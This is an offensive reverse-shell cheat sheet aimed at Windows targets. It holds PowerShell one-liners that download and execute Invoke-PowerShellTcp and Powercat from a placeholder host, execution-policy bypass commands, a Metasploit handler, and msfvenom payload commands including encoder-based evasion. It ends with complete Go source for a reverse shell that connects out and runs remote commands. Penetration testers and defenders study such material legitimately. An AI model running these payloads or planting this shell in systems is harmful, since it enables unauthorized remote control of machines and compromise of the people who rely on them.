Stabilization
:: When the target is Windows, wrap the listener in rlwrap before the target connects back: the raw cmd/PowerShell shell has no line editing or history, rlwrap adds both (rlwrap is a Linux-side tool, it runs on the catching host, not on the target)
rlwrap nc -nvlp <PORT>
CMD - PSH
- CMD
- Invoke-PowerShellTcp
- Powercat
# [Invoke-PowerShellTcp] Download - Execute
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');" "Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"
# [Powercat] Download - Execute
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Powercat.ps1');" "Powercat -c IP -p PORT -e cmd"
:: [Invoke-PowerShellTcp] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"
:: [Powercat] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Powercat.ps1;Powercat -c IP -p PORT -e cmd"
# Download - Execute
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');" "Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"
# Import - Execute
Set-ExecutionPolicy Bypass -Scope process -Force
. .\Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT
# List Execution Policy Rules
Get-ExecutionPolicy -List | Format-Table -AutoSize
# Alternatively, append this call to the end of the script itself, so that downloading or dot-sourcing the script fires the reverse shell immediately without a second command
Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT
# Download - Execute
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Powercat.ps1');" "Powercat -c IP -p PORT -e cmd"
# Import - Execute
Set-ExecutionPolicy Bypass -Scope process -Force
. .\Powercat.ps1
Powercat -c IP -p PORT -e cmd
# List Execution Policy Rules
Get-ExecutionPolicy -List | Format-Table -AutoSize
Interface
:: Enable Unicode Characters
chcp 65001
:: Set Keyboard Layout (the value must be a valid BCP-47 language tag, e.g. en-US; `us-US` is not one and the cmdlet rejects it)
Set-WinUserLanguageList -LanguageList en-US -Force
Metasploit
:: Catching a Reverse Shell
:: Load the Module
use exploit/multi/handler
:: Parameters
set LHOST <IP>
set LPORT <PORT>
:: Set PAYLOAD to exactly the payload msfvenom was given below (staged vs stageless, x86 vs x64, shell vs meterpreter): with a mismatched handler the connection arrives but staging never completes or the session dies immediately
set PAYLOAD windows/shell/reverse_tcp
PAYLOADS
- STAGED
- STAGELESS
:: Meterpreter, staged (the `/` in meterpreter/reverse_tcp: the binary holds only a small stager that pulls the rest from the handler at connect time, so the handler must be up and use the same staged payload)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT
:: Reverse TCP
msfvenom -p windows/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT
:: Reverse TCP, x86, encoded. shikata_ga_nai only rewrites the payload bytes; the encoder itself is heavily signatured and should not be relied on as AV evasion
msfvenom -p windows/shell/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT
:: Meterpreter, stageless (the `_` in meterpreter_reverse_tcp: the whole payload is inside the binary, larger on disk but no second download at connect time)
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT
:: Reverse TCP
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT
:: Reverse TCP, x86, encoded. Same caveat as above: shikata_ga_nai changes bytes, not behaviour, and is itself well known to AV engines
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT
Upgrading To Meterpreter
It May Be Necessary To Run The Commands Multiple Times Before Succeeding
:: Background the SHELL: [CTRL+Z]
:: Provide the Session Number
sessions -u SESSION
:: Background the SHELL: [CTRL+Z]
:: Load the Module
use multi/manage/shell_to_meterpreter
:: Provide the Session Number
:: [Method 1]
run session=SESSION
:: [Method 2]
run session=SESSION win_transfer=POWERSHELL
:: [Method 3]
run session=SESSION win_transfer=VBS
GO Reverse Shell
Features Missing
Mostly stable. "Undetected" is a point-in-time claim and should be re-tested against the engagement's AV/EDR: the binary spawns cmd/bash and talks over an unauthenticated, unencrypted TCP socket, which is the kind of behaviour endpoint and network detections commonly flag. Works on Windows and Linux (the shell is chosen from runtime.GOOS in execute)
.
:: Build
:: Cross-compiles from Linux and generates a binary named [GoRevShell.exe]; GOARCH=386 yields a 32-bit PE that runs on both 32- and 64-bit Windows (use GOARCH=amd64 for a native 64-bit build)
env GOOS=windows GOARCH=386 go build GoRevShell.go
:: Usage
GoRevShell.exe -i <IP> -p <PORT>
:: Catching The Shell
rlwrap nc -nvlp <PORT>
SOURCE
package main
import (
	"bufio"
	"flag"
	"fmt"
	"net"
	"os"
	"os/exec"
	"runtime"
	"strings"
)
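// execute maps one line received from the operator to the shell invocation
// that will run it: "cmd /C <line>" on Windows, "/bin/bash -c <line>" on
// Linux. It returns the executable name and its argument list for
// exec.Command.
//
// The trailing line terminator is stripped first: bufio.ReadString('\n')
// keeps it, and a CRLF-terminated line (e.g. from a Windows-side listener)
// would otherwise reach bash as "<cmd>\r" and fail with "command not found".
//
// On any other GOOS the executable name is returned empty; the caller's
// exec.Command then fails and the error is reported over the connection
// instead of silently running nothing.
func execute(msg string) (string, []string) {
	line := strings.TrimRight(msg, "\r\n")

	var exe, cflag string
	switch runtime.GOOS {
	case "windows":
		exe, cflag = "cmd", "/C"
	case "linux":
		exe, cflag = "/bin/bash", "-c"
	default:
		// Not fatal by design: exe stays "" and the caller surfaces the
		// resulting exec error to the operator.
		fmt.Printf("Unsupported OS %q; no shell configured.\n", runtime.GOOS)
		cflag = "-c"
	}
	return exe, []string{cflag, line}
}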
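// main connects back to the operator at -i/-p and serves an interactive
// command loop over that single TCP connection until the peer closes it.
//
// Each iteration writes a "<cwd>> " prompt, reads one line, hands it to
// execute(), runs it and writes the combined stdout+stderr back.
//
// Security note: the channel is plain TCP with no authentication and no
// encryption. Whoever is listening on IP:PORT, or can observe the path,
// gets the shell and every command/result in cleartext. Only use against
// systems you are authorized to test.
func main() {
	host := flag.String("i", "", "HOST")
	port := flag.String("p", "", "PORT")
	flag.Parse()
	if *host == "" || *port == "" {
		fmt.Println("Usage: [OPTIONS]\n\n GO Reverse Shell\n\nOptions:\n -i HOST -p PORT")
		return
	}

	// JoinHostPort brackets IPv6 literals, which a plain "%s:%s" did not.
	conn, err := net.Dial("tcp", net.JoinHostPort(*host, *port))
	if err != nil {
		// Previously the error was discarded and the nil conn panicked on
		// the first write.
		fmt.Fprintln(os.Stderr, "connect:", err)
		os.Exit(1)
	}
	defer conn.Close()

	// One reader for the whole session. Re-creating it per line dropped any
	// bytes already buffered beyond the first '\n', so a burst of several
	// lines lost all but the first.
	reader := bufio.NewReader(conn)
	for {
		cwd, _ := os.Getwd() // best-effort: an empty prompt is acceptable
		fmt.Fprintf(conn, "\n%s> ", cwd)

		msg, readErr := reader.ReadString('\n')
		if readErr != nil && msg == "" {
			// Peer closed or reset the connection: stop instead of spinning
			// forever on an empty command.
			return
		}

		exe, args := execute(msg)
		// CombinedOutput so the operator also sees stderr; Output() discarded
		// it and made failing commands look silent.
		out, runErr := exec.Command(exe, args...).CombinedOutput()
		if runErr != nil {
			// Report to the peer, not to local stdout (the old fmt.Println
			// wrote conn and the literal format string to the console).
			fmt.Fprintf(conn, "\n\n%s\n", runErr)
		}
		fmt.Fprintf(conn, "%s", out)

		if readErr != nil {
			// The last partial line has been handled; the stream is at EOF.
			return
		}
	}
}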